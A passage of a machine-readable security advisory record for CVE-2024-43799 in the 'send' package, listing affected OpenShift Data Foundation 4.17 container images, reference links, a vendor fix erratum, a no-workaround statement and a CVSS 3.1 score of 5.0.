"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
